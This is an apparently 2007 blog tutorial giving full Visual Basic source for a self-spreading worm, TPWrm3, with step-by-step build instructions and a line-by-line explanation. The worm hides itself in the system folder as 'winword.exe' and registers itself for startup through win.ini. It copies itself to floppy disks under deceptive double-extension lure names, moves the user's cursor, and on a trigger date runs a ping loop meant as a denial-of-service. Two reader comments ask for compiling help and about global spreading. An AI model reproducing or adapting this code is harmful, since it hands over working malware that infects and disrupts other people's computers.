This is a Premium Blog

TPWrm3

Written on June 5, 2007 by admin

This worm name is TPWrm3 (TutorialsPortal Worm 3). In this worm, I add launcher trick methode that use Windows Configuration File (win.ini) and use array for worm filename, so this worm can copying itself with various filename.

Algorithm

1. Check for worm existence

2. If worm doesn’t find itself in computer, worm will copying itself to System Windows folder and manipulate win.ini for execute worm every Windows startup.

3. Every 1 minute try to copy itself to Floppy Disk with 10 random filename.

4. Every 30 second, cursor will move to left corner of monitor.

5. Every 13th October will show “TPWrm3 in your computer..!”, and trying to send Denial of Service (DoS) to website.

Coding

Create new project. Change Project Name to ‘TPWrm3’, in Make tab, change Application Title to ‘TPWrm3’. Select option ‘Compile to P-Code’ in Compile tab.

Add 2 Timer object, and 1 module. Change the properties to:

Form1
Name: frmTPWrm3
Icon: (icon)
ShowInTaskbar: False
Visible: False

Timer1
Name: TPWrm3
Enable: True
Interval: 60000

Timer2
Name: tmrJoke
Enable: True
Interval: 30000

Module1
Name: mdlFileIni

 

Write this source code to mdlFileIni:

PLAIN TEXT
Visual Basic:
  1. Declare Function GetPrivateProfileString Lib "kernel32" Alias _
  2. "GetPrivateProfileStringA" (ByVal lpApplicationName As _
  3. String, ByVal lpKeyName As String, ByVal lpDefault As String, _
  4. ByVal lpReturnedString As String, ByVal nSize As Long, ByVal _
  5. lpFileName As String) As Long
  6.  
  7. Declare Function WritePrivateProfileString Lib "kernel32" Alias _
  8. "WritePrivateProfileStringA" (ByVal lpApplicationName As _
  9. String, ByVal lpKeyName As String, ByVal lpString As Any, _
  10. ByVal lpFileName As String) As Long
  11.  
  12. Function ReadINI(Section, KeyName, filename As String) As String
  13. Dim sRet As String
  14. sRet = String(255, Chr(0))
  15. ReadINI = Left(sRet, GetPrivateProfileString(Section, ByVal _
  16. KeyName, "", sRet, Len(sRet), filename))
  17. End Function
  18.  
  19. Function writeini(sSection As String, sKeyName As String, _
  20. sNewString As String, sFileName) As Integer
  21. Dim r
  22. r = WritePrivateProfileString(sSection, sKeyName, sNewString, _
  23. sFileName)
  24. End Function

 

Write this source code to frmTPWrm3:

PLAIN TEXT
Visual Basic:
  1. 'TPWrm3 by RiE
  2. 'Bogor, West Java - Indonesia
  3. Option Explicit
  4.  
  5. Private Declare Function SetCursorPos Lib "user32" (ByVal x As _
  6. Long, ByVal Y As Long) As Long
  7.  
  8. Private Sub Form_Load()
  9. On Error Resume Next
  10. Dim kiddie As Variant
  11. Dim winfolder, sysfolder As Object
  12. Dim MainFile As String
  13. Set kiddie = CreateObject("scripting.filesystemobject")
  14. Set winfolder = kiddie.GetSpecialFolder(0)
  15. Set sysfolder = kiddie.GetSpecialFolder(1)
  16. MainFile = sysfolder & "\" & "winword.exe"
  17. If App.PrevInstance = True Then End
  18. If ReadINI("WINDOWS", "Run", winfolder & "\" & "win.ini") <> _
  19. MainFile Then
  20. Call InfectSystem
  21. End If
  22. If App.Path = "A:\" Or App.Path = "B:\" Then
  23. Unload Me
  24. End If
  25. End Sub
  26.  
  27. Private Sub InfectSystem()
  28. On Error Resume Next
  29. Dim kiddie As Variant
  30. Dim winfolder, sysfolder As Object
  31. Dim MainFile As String
  32. Set kiddie = CreateObject("scripting.filesystemobject")
  33. Set winfolder = kiddie.GetSpecialFolder(0)
  34. Set sysfolder = kiddie.GetSpecialFolder(1)
  35. MainFile = sysfolder & "\" & "winword.exe"
  36. FileCopy WormFile, MainFile
  37. SetAttr MainFile, vbHidden + vbReadOnly + vbSystem
  38. writeini "WINDOWS", "Run", MainFile, winfolder & "\" & "win.ini"
  39. End Sub
  40.  
  41. Private Sub InfectFloppy()
  42. On Error Resume Next
  43. Dim Acak As Integer
  44. Dim BeautifulName(10) As String
  45. BeautifulName(0) = "secret.doc .exe"
  46. BeautifulName(1) = "password.doc .exe"
  47. BeautifulName(2) = "sex.doc .exe"
  48. BeautifulName(3) = "britney spears nude.doc .exe"
  49. BeautifulName(4) = "fuck.doc .exe"
  50. BeautifulName(5) = "pussy.doc .exe"
  51. BeautifulName(6) = "nude.doc .exe"
  52. BeautifulName(7) = "public sex.doc .exe"
  53. BeautifulName(8) = "anal.doc .exe"
  54. BeautifulName(9) = "oral.doc .exe"
  55. Randomize
  56. Acak = Int(Rnd * 10)
  57. If Len(Dir$("A:\*.doc .exe")) = 0 Then
  58. FileCopy WormFile, "A:\" & BeautifulName(Acak)
  59. End If
  60. End Sub
  61.  
  62. Private Sub tmrJoke_Timer()
  63. On Error Resume Next
  64. SetCursorPos 1, 1
  65. End Sub
  66.  
  67. Private Sub tmrTPWrm3_Timer()
  68. On Error Resume Next
  69. Call InfectFloppy
  70. If Day(Now) = 13 And Month(Now) = 10 Then
  71. Call PayLoad
  72. Unload Me
  73. End If
  74. End Sub
  75.  
  76. Private Sub PayLoad()
  77. On Error Resume Next
  78. Dim Target As String
  79. Dim pingmore As Integer
  80. MsgBox "TPWrm3 in your computer..!", vbExclamation
  81. Target = "http://www.google.com"
  82. For pingmore = 1 To 1000
  83. Shell ("ping -a -l " & Target & " 65500")
  84. Next pingmore
  85. End Sub
  86.  
  87. Private Function WormFile()
  88. Dim WPath, WName As String
  89. WPath = App.Path
  90. If Right(WPath, 1) <> "\" Then
  91. WPath = WPath & "\"
  92. End If
  93. WName = App.EXEName & ".exe"
  94. WormFile = WPath & WName
  95. End Function

 

Compile it, File > Make TPWrm3.exe

 

Source Code Description

PLAIN TEXT
Visual Basic:
  1. 'TPWrm3 by RiE
  2. 'Bogor, West Java - Indonesia
  3. Option Explicit
  4.  
  5. Private Declare Function SetCursorPos Lib "user32" (ByVal x As _
  6. Long, ByVal Y As Long) As Long

Declare function SetCursorPos from user32 library. This statement is API Function. Function SetCursorPos is useful to set cursor position in monitor.

 

PLAIN TEXT
Visual Basic:
  1. Private Sub Form_Load()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim winfolder, sysfolder As Object
  5. Dim MainFile As String
  6. Set kiddie = CreateObject("scripting.filesystemobject")
  7. Set winfolder = kiddie.GetSpecialFolder(0)
  8. Set sysfolder = kiddie.GetSpecialFolder(1)
  9. MainFile = sysfolder & "\" & "winword.exe"
  10. If App.PrevInstance = True Then End
  11. If ReadINI("WINDOWS", "Run", winfolder & "\" & "win.ini") <> _
  12. MainFile Then
  13. Call InfectSystem
  14. End If
  15. If App.Path = "A:\" Or App.Path = "B:\" Then
  16. Unload Me
  17. End If
  18. End Sub

Worm trying to get Windows Special Folder, then check for worm existence in memory.

Worm check win.ini configuration in Windows section and Run key, if can’t get MainFile value, worm call InfectSystem procedure.

 

PLAIN TEXT
Visual Basic:
  1. Private Sub InfectSystem()
  2. On Error Resume Next
  3. Dim kiddie As Variant
  4. Dim winfolder, sysfolder As Object
  5. Dim MainFile As String
  6. Set kiddie = CreateObject("scripting.filesystemobject")
  7. Set winfolder = kiddie.GetSpecialFolder(0)
  8. Set sysfolder = kiddie.GetSpecialFolder(1)
  9. MainFile = sysfolder & "\" & "winword.exe"
  10. FileCopy WormFile, MainFile
  11. SetAttr MainFile, vbHidden + vbReadOnly + vbSystem
  12. writeini "WINDOWS", "Run", MainFile, winfolder & "\" & "win.ini"
  13. End Sub

InfectSystem procedure use system object to get Special Folder in Windows. This worm copying itself to System Windows folder with name ‘winword.exe’ then change file attribute to Hide, Read Only, and System.

Worm manipulates win.ini in Windows section and Run key, then change value to winword.exe path.

 

PLAIN TEXT
Visual Basic:
  1. Private Sub InfectFloppy()
  2. On Error Resume Next
  3. Dim Acak As Integer
  4. Dim BeautifulName(10) As String
  5. BeautifulName(0) = "secret.doc .exe"
  6. BeautifulName(1) = "password.doc .exe"
  7. BeautifulName(2) = "sex.doc .exe"
  8. BeautifulName(3) = "britney spears nude.doc .exe"
  9. BeautifulName(4) = "fuck.doc .exe"
  10. BeautifulName(5) = "pussy.doc .exe"
  11. BeautifulName(6) = "nude.doc .exe"
  12. BeautifulName(7) = "public sex.doc .exe"
  13. BeautifulName(8) = "anal.doc .exe"
  14. BeautifulName(9) = "oral.doc .exe"
  15. Randomize
  16. Acak = Int(Rnd * 10)
  17. If Len(Dir$("A:\*.doc .exe")) = 0 Then
  18. FileCopy WormFile, "A:\" & BeautifulName(Acak)
  19. End If
  20. End Sub

This procedure will create 10 data array for use as filename. We use social engineering in here. Filename use ‘.doc .exe’ as extension, because Windows Explorer will hide the real extension, so this worm will be like Word document.

 

PLAIN TEXT
Visual Basic:
  1. Private Sub tmrJoke_Timer()
  2. On Error Resume Next
  3. SetCursorPos 1, 1
  4. End Sub
  5.  
  6. Private Sub tmrTPWrm3_Timer()
  7. On Error Resume Next
  8. Call InfectFloppy
  9. If Day(Now) = 13 And Month(Now) = 10 Then
  10. Call PayLoad
  11. Unload Me
  12. End If
  13. End Sub

tmrJoke procedure will call SetCursorPos function with x=1 and y=1 coordinat.

tmrTPWrm3 is same with previous tutorial .

 

PLAIN TEXT
Visual Basic:
  1. Private Sub PayLoad()
  2. On Error Resume Next
  3. Dim Target As String
  4. Dim pingmore As Integer
  5. MsgBox "TPWrm3 in your computer..!", vbExclamation
  6. Target = "http://www.google.com"
  7. For pingmore = 1 To 1000
  8. Shell ("ping -a -l " & Target & " 65500")
  9. Next pingmore
  10. End Sub

Except show message, this worm will send ping to Google.com.

 

PLAIN TEXT
Visual Basic:
  1. Private Function WormFile()
  2. Dim WPath, WName As String
  3. WPath = App.Path
  4. If Right(WPath, 1) <> "\" Then
  5. WPath = WPath & "\"
  6. End If
  7. WName = App.EXEName & ".exe"
  8. WormFile = WPath & WName
  9. End Function

WormFile function is same with previous tutorial .

Posted in Visual Basic Tutorials
Tags: , , ,

If you enjoyed this post Subscribe to our feed

2 Comments on “TPWrm3”

  1. artur | September 20th, 2007at 12:53 am

    i can’t compile since there are some syntax errors
    need help
    plz write as soon as possible

  2. Yam | September 26th, 2007at 7:52 pm

    How will it spread globally huh!

Leave a Reply